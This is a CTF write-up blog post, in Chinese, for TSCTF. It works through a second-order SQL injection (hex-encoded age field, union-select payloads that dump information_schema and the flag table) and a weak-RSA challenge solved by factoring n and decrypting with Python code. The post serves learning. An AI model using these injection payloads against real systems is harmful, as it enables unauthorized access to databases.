TSCTF Misc&Web writeup

Posted on | In

Buy Flag

这道题跟今天强网杯的Three hit如出一辙,题目是一个二次注入,用户注册会将age存入数据库,登陆成功后index.php界面会从数据库中查询具有相同age的username。

二次注入:源于开发人员对数据库中的数据太过信任,凡是提取数据库中来自用户的数据不经过处理,即可触发二次注入。

刚开始做这道题的时候查看html源码发现

1
2
3
4
5
6
7
8
9
10
11
  function BuyFlag(){
if(!true){
	alert('Please sign in first!');
}
      else if(18>18){
          alert('You are too old to buy it!');
      }
      else {
          alert('Amazing, maybe, i said maybe, you can bug it!');
      }
  }

很容易可以利用age=18绕过,然而并没有什么用…

发现age必须为数字。可以通过hex编码绕过,于是开始下面的测试过程

测试过程:

  • 判断为 “字符型注入”

    1’ 即 age=0x3127 注册成功, 登陆成功&页面显示异常

    1’# age=0x312723 注册成功, 登陆成功&页面显示正常

  • 寻找注入点

    其实这一步是在不停的胡乱测试中偶然发现的 2333… 发现这里的内部并不是固定的

    1’ and 1=2#

  • 判断字段数
    1’ order by 1# 正常
    1’ order by 2# 异常
    1’ and 1=2 union select 123# 注入点处显示123

  • 爆库

1
2
3
4
1' and 1=2 union select database()# 
1' and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=database()#    children,py_flag
1' and 1=2 union select group_concat(column_name) from information_schema.columns where table_name='py_flag'#  Id,tsctf_fla9 
1' and 1=2 union select tsctf_fla9 from py_flag#  TSCTF{Simple_Sql_f0r_Y0u}

简单的RSA

010Editor打开图片发现隐藏的rsa参数

1
2
3
4
5
6
7
8
n=52A99E249EE7CF3C0CBF963A009661772BC9CDF6E1E3FBFC6E44A07A5E0F894457A9F81C3AE132AC5683D35B28BA5C324243
十进制=833810193564967701912362955539789451139872863794534923259743419423089229206473091408403560311191545764221310666338878019

e=010001
=>65537

cipher=18228DF578DAD6DC893CBCD95BD934D28F26C820778E7AFEB6B3BE38FD5298E497FAF8CEAA78C613E5F5FADD4BD5E50FD8A5
=> 2434474437519739825285674247289880763631199976378755148355551547916734778248566 81065818912755263077705578942115259340965

已知n、e、cipher, 来恢复明文,利用在线因式分解http://factordb.com/ (注: 输入需要为十进制),或者使用工具yafu分解

1
2
p = 863653476616376575308866344984576466644942572246900013156919
q = 965445304326998194798282228842484732438457170595999523426901

已知p、q、e、c,求明文

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# coding = utf-8  
def computeD(fn, e):  
    (x, y, r) = extendedGCD(fn, e)  
    #y maybe < 0, so convert it  
    if y < 0:  
        return fn + y  
    return y  
  
def extendedGCD(a, b):  
    #a*xi + b*yi = ri  
    if b == 0:  
        return (1, 0, a)  
    #a*x1 + b*y1 = a  
    x1 = 1  
    y1 = 0  
    #a*x2 + b*y2 = b  
    x2 = 0  
    y2 = 1  
    while b != 0:  
        q = a / b  
        #ri = r(i-2) % r(i-1)  
        r = a % b  
        a = b  
        b = r  
        #xi = x(i-2) - q*x(i-1)  
        x = x1 - q*x2  
        x1 = x2  
        x2 = x  
        #yi = y(i-2) - q*y(i-1)  
        y = y1 - q*y2  
        y1 = y2  
        y2 = y  
    return(x1, y1, a)  
  
p = 863653476616376575308866344984576466644942572246900013156919  
q = 965445304326998194798282228842484732438457170595999523426901  
e = 65537
c = 0x18228DF578DAD6DC893CBCD95BD934D28F26C820778E7AFEB6B3BE38FD5298E497FAF8CEAA78C613E5F5FADD4BD5E50FD8A5  
  
n = p * q  
fn = (p - 1) * (q - 1)  
  
d = computeD(fn, e)  
m = pow(c,d,n)
print hex(m)[2:-1].decode('hex')

flag: TSCTF{ez_rsa_real_ez~}

个人感受:

  • 各种进制转换,尤其是位数较长的,再也不相信在线网站的转换了!!!
坚持原创技术分享,您的支持将鼓励我继续创作!